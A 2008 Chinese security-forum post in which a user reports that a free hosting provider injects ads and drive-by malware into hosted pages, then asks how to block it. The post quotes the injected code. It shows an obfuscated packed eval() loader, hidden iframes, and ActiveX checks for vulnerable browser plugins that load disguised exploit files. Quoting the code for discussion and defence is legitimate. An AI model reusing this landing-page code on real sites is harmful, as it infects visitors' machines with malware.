返回列表 发帖
虚竹

Rank: 5Rank: 5

帖子
300 
积分
762 
威望
1212  
金钱
1030  
在线时间
3 小时 

贡献奖灌水王帅哥勋章
1 跳转到 » 倒序看帖
打印
tT
发表于 2008-7-23 08:27 | 只看该作者

[讨论]免费空间代码屏蔽问题

免费空间, 代码, 讨论
[讨论]免费空间代码屏蔽问题
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
议题作者:i_lv_lcx

最近发现,很多免费空间都会在你上传的网页中自动插入广告代码,甚至直接在你的网页理挂马

我最近用的www.5944.net  就貌似在用我的网页挂马挂流量

如图1

   未命名1.jpg (61.67 KB)

图1

2008-2-23 10:38

打开http://086170.service-google.cn/vip/Cn81599.htm  代码如下
引用:
<iframe src=wm2/index.html width=1 height=1 border=1></iframe>

<script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b("\\1\\0\\a\\1\\2\\9\\0\\2\\8\\4\\1\\5\\3\\0\\c\\7\\i\\h\\4\\d\\3\\2\\5\\f\\6\\e\\6\\0\\7\\g");',19,19,'x65|x74|x61|x6C|x73|x79|x6E|x27|x20|x72|x78|eval|x3D|x70|x6F|x3A|x3E|x69|x64'.split('|'),0,{}))</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1554929.js"></script>
再打开代码你引用的http://086170.service-google.cn/vip/wm2/index.html

代码如下:
引用:
<script>
        window.onerror=function(){return true;}
        window.status="完成";
</script>
<script>
                try{if(new ActiveXObject("Mi"+"cro"+"soft.X"+"ML"+"H"+"TT"+"P"))window["document"]["write"]('<iframe style=display:none src="2.gif"></iframe>');}catch(e){};
                eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b{a(c d("9"+"\\g\\7\\3\\2\\4\\5\\6"+"f"+"h.1"))o["p"]["q"](\'<0 n=m:i j="8.k"></0>\')}l(e){}',27,27,'iframe||x2E|x6C|x49|x45|x52|x74||IERP|if|try|new|ActiveXObject||PC|x43|tl|none|src|gif|catch|display|style|window|document|write'.split('|'),0,{}));
                try{if(new ActiveXObject("M"+"PS.S"+"to"+"rm"+"Pl"+"ay"+"er"))window["document"]["write"]('<iframe style=display:none src="1.gif"></iframe>');}catch(e){};
                try{if(new ActiveXObject("P"+"OW"+"ERPLA"+"YE"+"R.Powe"+"rPlay"+"erC"+"trl.1"))window["document"]["write"]('<iframe style=display:none src="5.gif"></iframe>');}catch(e){};
                try{if(new ActiveXObject("GLCH"+"AT.GLCh"+"atCtrl.1"))window["document"]["write"]('<iframe style=display:none src="11.gif"></iframe>');}catch(e){};
                try{if(new ActiveXObject("Ba"+"id"+"uB"+"ar.To"+"ol"))window["document"]["write"]('<iframe style=display:none src="4.gif"></iframe>');}catch(e){};               
</script>
我真是不敢再往下看了..

不知邪八的各位大大有没有什么方法能屏蔽掉类似的代码
帖子9 精华0 积分36 阅读权限40 在线时间7 小时
收藏 分享

返回列表